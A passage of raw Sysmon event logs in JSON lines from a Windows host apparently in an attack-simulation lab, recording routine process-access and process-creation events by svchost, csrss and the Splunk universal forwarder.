06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-106C-5F25-0000-0010ED600300}\r\nSourceProcessId: 3816\r\nSourceThreadId: 3836\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nTargetProcessId: 3052\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","TargetProcessId":"3052","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.893\r\nProcessGuid: {E2A3D6B1-1102-5F25-0000-0010E86C0500}\r\nProcessId: 3028\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {E2A3D6B1-1102-5F25-0000-0010396C0500}\r\nParentProcessId: 3052\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: btool  server list general --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.893","ProcessGuid":"{E2A3D6B1-1102-5F25-0000-0010E86C0500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool server list general --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1102-5F25-0000-0010396C0500}","ParentProcessId":"3052","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list general --no-log","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-1060-5F25-0000-0010C4650200}\r\nSourceProcessId: 3052\r\nSourceThreadId: 3016\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-0010E86C0500}\r\nTargetProcessId: 3028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-1060-5F25-0000-0010C4650200}","SourceProcessId":"3052","SourceThreadId":"3016","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-0010E86C0500}","TargetProcessId":"3028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1102-5F25-0000-0010E86C0500}\r\nTargetProcessId: 3028\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1102-5F25-0000-0010E86C0500}","TargetProcessId":"3028","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:46.882","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:46.882\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 